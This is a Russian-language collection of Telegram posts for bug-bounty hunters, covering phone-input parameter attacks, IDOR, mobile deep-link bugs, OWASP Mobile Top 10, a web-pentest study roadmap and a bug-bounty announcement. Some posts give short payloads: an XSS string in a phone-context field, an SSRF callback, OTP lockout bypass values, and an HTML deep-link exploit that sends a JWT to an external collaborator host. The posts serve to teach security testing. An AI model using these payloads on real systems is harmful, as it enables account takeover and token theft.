⛈ Атаки на механизм ввода номера телефона

Привет! Давай разберемся как найти уязвимости в форме ввода телефона.
Согласно RFC 5341 URI номера телефона может иметь параметры, которые нужны для передачи более точных данных
Чаще всего параметры принимают почтовые сервисы либо веб-приложения в которых отсутствует жесткая валидация номеров.

🟩Пример: параметр phone-context может использоваться для определения того, какой код страны(+7,+1) используется. Если ты зашел на сайт и определился твой город, то при регистрации вводя свой номер телефона, ты можешь вписать свой номер без кода страны т.к. он может подставится в параметр.

🟩Атаки используя параметры:
✅ XSS
+88005553535;phone-context=<script>alert(1)</script>
// Следует поставить в query string параметр в который помещен номер

✅ SSRF
+88005553535;phone-context=burpcollab
// Работает редко, в основном в старых системах

✅ OTP Обход блокировки
+88005553535;ext=0
+88005553535;ext=2
+88005553535;ext=3
// Если заблокировали то подставляем ext с цифрой и продолжаем брутить с того кода, с которого залочили

📌 Более подробно изучить можно тут:
📶 HackTricks

ЧТНП | #web

⛈ IDOR - как предсказать идентификатор

Привет! При тестировании веб приложений, в попытках найти IDOR, ты наверное замечал что существуют разные ID
Так вот, в данном видео рассказывается как предсказывать идентификаторы а также разбираются отчеты с bug bounty где рассказывается как баг хантеры смогли предсказать ID и получить IDOR
Happy hacking 😉

📶 IDOR - how to predict an identifier

ЧТНП | #web

⛈ Android & iOS Deep link vuln

Привет! Сегодня познакомимся с уязвимостями deep link'ов в мобильных приложениях и узнаем как найти в них уязвимости

🟢Deep Link
По сути дип линк нужен для координации или перенаправления в те или иные части мобильного приложения
Нужно это для удобства, ты можешь легко переключаться между приложениями или переходить с веб-сайта на приложение без переключения на само мобильное приложение
У каждого приложения свой дип линк и выглядит примерно так:
➡️ название_приложения://параметр
➡️ keklol://open_document=name

🟢Ищем уязвимости
Уязвимости возникают за счет неправильной обработки параметров из дип линков
Уязвимости могут быть разные в зависимости от того, что за параметр перед вами

➡️ Кейс:
Коллега на работе нашел уязвимость CSRF, данная уязвимость позволяла присылать JWT токен на burp collaborator
⬜️ Сначала ищем параметры дип линка, найти их можно при реверсе самого приложения, либо через утилиту strings
⬜️ Обнаружился параметр URL, который принимал сторонние ссылки
⬜️ Поскольку дип линк это ссылка, значит нужно создать эксплойт в виде простой html страницы с внедрением данного дип линка и его параметра
<a href="keklol://url=https://burp_collab">click</a>
⬜️ После открытия ссылки, на burp collaborator приходит jwt token, раскодировав токен, в нем обнаруживается конфиденциальная информация о пользователе

🟢Заключение
В целом на этом всё, импакт от этого может быть разный, в зависимости от того, что ты получаешь в ответ, если это RCE то критический, если присылаются пользовательские данные - высокий
Если можно заставить пользователя подписаться на какие-то каналы - низкий
Happy hacking ☺️

📌 В качестве дополнительных примеров делюсь полезными ссылками:
📶 RCE через deep link
📶 CSRF в приложении перископ

ЧТНП | #mobile

Победа 😎
Буду вещать вам с хакса ❤️
Также если будет можно, то и новые статьи про баги с баг баунти буду публиковать 🦔

Content-Security-Policy: способ борьбы с уязвимостями межсайтового скриптинга 🔒

Настройка, использование и способы обхода защиты 🐈

https://telegra.ph/Content-Security-Policy-10-31

⛈ OWASP Mobile Top Ten 2023

Наконец-то, спустя 7 лет вышел новый топ 10 по мобилкам
Вот как это теперь выглядит вкратце:

🟢M1: Improper Credential Usage
🟢M2: Inadequate Supply Chain Security
🟢M3: Insecure Authentication/Authorization
🟢M4: Insufficient Input/Output Validation
🟢M5: Insecure Communication
🟢M6: Inadequate Privacy Controls
🟢M7: Insufficient Binary Protections
🟢M8: Security Misconfiguration
🟢M9: Insecure Data Storage
🟢M10: Insufficient Cryptography

Happy hacking ☺️

📌 Полезные ссылки по апдейту:
📶 Мысли основателя канала Android Guard
📶 OWASP 2023

ЧТНП | #mobile

#podcast #НеДляГалочки

Утечки или ночной кошмар DPO. Откуда берутся, в чем причины. Разбираем кейсы с этичным хакером😄

ОСТОРОЖНО! В этом выпуске много практических кейсов, конкретных рекомендаций и историй из жизни хакера.

💡Apple, Яндекс

🎤Ведущие выпуска:

🔵Кристина Боровикова, со-основатель RPPA, Kept Privacy Team Lead

🔵Елизавета Дмитриева, data privacy engineer в российском инхаусе

🆕Помогали справиться с кошмаром:

🔵Александр Герасимов — этичный хакер, эксперт в области тестирования на проникновение и анализа защищенности. Директор по информационной безопасности и сооснователь Awillix.

🔵Елизавета Никулина — директор по маркетингу и PR в Awillix

Обсудили:

⬇️Векторы атак
⬇️Жизненный цикл утечек данных
⬇️Последствия утечек для человека
⬇️Реагирование на инциденты, а том числе PR-позиция компании
⬇️Немного коснулись базовой инфобезной терминологии

⛈ Подход к изучению веб пентеста | Часть 1

Привет! Решил опубликовать свой подход к изучению веб приложений. Этот подход я сформировал на основе матрицы компетенций которую прикреплю в конце, и на основе зарубежных роадмапов по изучению вебки. Шел я по нему года 2, если не больше, до этого был другой подход, до конца еще не дошел. Можно было и короче, но я часто ленился, вдобавок под каждой темой буду писать зачем это нужно и чем будет полезно

📱 Изучение устройства веба и защитных механизмов
Необходимо знать как устроен cors, sop, csp и т.д. с ними нужно научится работать и не много понастраивать
📌Это поможет тебе в понимании более глубокой защиты от базовых уязвимостей, такие как хсс, csrf и другие. Также это может тебе обходить защитные механизмы и получить тот самый алерт от пейлоада xss или поможет в чейне уязвимостей

⚙️ Изучение механизмов
Под механизмами я имею ввиду базовые элементы веб приложения такие как: аутентификации, авторизация, поиск и т.д. Их нужно научится программировать на любом языке который связан с вебом
📌Понимание как устроены механизмы поможет тебе в построении верной гипотезы на предмет есть там уязвимость или нет, тем самым ты будешь способен предугадывать наличие разных уязвимостей в конкретном механизме в зависимости от стека технологий, а не тыкать на все уязвимости подряд

👩‍💻 Изучение технологий
Изучение базовых технологий веба, такие как jwt, oauth, sso и др, нужно научится с ними работать, желательно кодить, также разобраться с тем как они устроены.
📌Понимание их внутреннего устройства поможет в детальном разборе уязвимостей, также будешь видеть как должно быть настроено нормально и как не правильно, оттуда и появятся свои проверки на разные уязвимости.

📌 Полезные ссылки:
📶 Матрица компетенций по веб и инфре
📶 Roadmap недавно обновленный
📶 Атаки на фреймворки и их особенности

ЧТНП | #web

⛈ Подход к изучению веб пентеста | Часть 2

🔐 Изучение рекомендаций по защите
Стоит начать изучать к примеру рекомендации по защите jwt от owasp и других комьюнити
📌 С этим ты начнешь в настоящем проекте видеть отклонения от этих рекомендаций и сможешь понять где уязвимо, также это поможет тебе глубже вникнуть в защиту и ее общие и детальные рекомендации как делать не надо

🔐 Изучение фреймворков
К примеру: laravel, django, bitrix и т.д.
📌 При столкновении с ними в реальном проекте ты будешь -+ понимать с чем ты столкнулся, как оно работает и функционирует, оттуда можно и поисследовать проект на мисконфиги, небезопасные скрипты написанные разработчиками и т.д. также будешь понимать какие встроенные защитные механизмы там уже есть по дефолту и будет понимание на какие уязвимости нет смысла тестировать, а каким стоит дать приоритет

💻 Изучение архитектуры
Изучение разных архитектур, например: serverless, SPA и т.д.
Это поможет тебе понимать веб приложение стоящие перед тобой - полностью или хотя бы частично
📌Анализ архитектуры поможет анализировать компоненты которые взаимосвязаны между собой и поможет в оценке функциональности приложения
К примеру: если при написании функционала разработчики везде в коде используют старый DOMPurify для защиты от XSS, то это приведет к уязвимостям во всем функционале, т.к. старый DOMPurify был уязвим к mXSS уязвимости
Или используется принцип "хранить все яйца в одной корзине", к примеру ты нашел CDN, прошерстил папки и файлы и нашел конфиденциальные данные пользователей

📌 Полезные ссылки:
📶 Матрица компетенций по веб и инфре
📶 Roadmap недавно обновленный
📶 Атаки на фреймворки и их особенности

ЧТНП | #web

🤓 Тот момент, когда не ты вышел на Wildberries, а Wildberries вышли на тебя… и позвали багхантить.

Такое уже было на августовском Standoff Hacks, когда за поиск уязвимостей в закрытых программах компания выплатила больше 4 млн ₽.

А с сегодняшнего дня маркетплейс запускает собственную багбаунти-программу на Standoff 365. Уязвимости можно искать на всех «ягодных» ресурсах: *.wildberries.ru, *.wb.ru, *.paywb.com, *.paywb.ru, *.wb-bank.ru.

Самое большое вознаграждение за баги, найденные в основном скоупе, — 250 000 ₽. Здесь предстоит проверить веб-версию и приложения маркетплейса и портала продавцов, сервис «Всем работа», платежный шлюз (только веб) и Balance Pay (только мобилки).

Остальные ресурсы включены в дополнительный скоуп, там максимальное баунти в два раза меньше.

😲 Отдельный сценарий — взлом личного кабинета тестового продавца. Если тебе это удастся, получишь 500 000 ₽.

Больше информации — в программе на сайте. Читай, изучай, ломай. Верим в тебя!

⛈ RCE | Где и как искать

Привет! Если ты ещё не находил RCE на баунти и задумывался как было бы здорово получить не дубль и много деняк, то это видео приоткроет завесу тайны об RCE.
В этом видео: разбор кейсов с баг баунти, где, в каких механизмах, и при каких обстоятельствах находили RCE...
Happy hacking 😏

📶 Where are all the RCEs?

ЧТНП | #web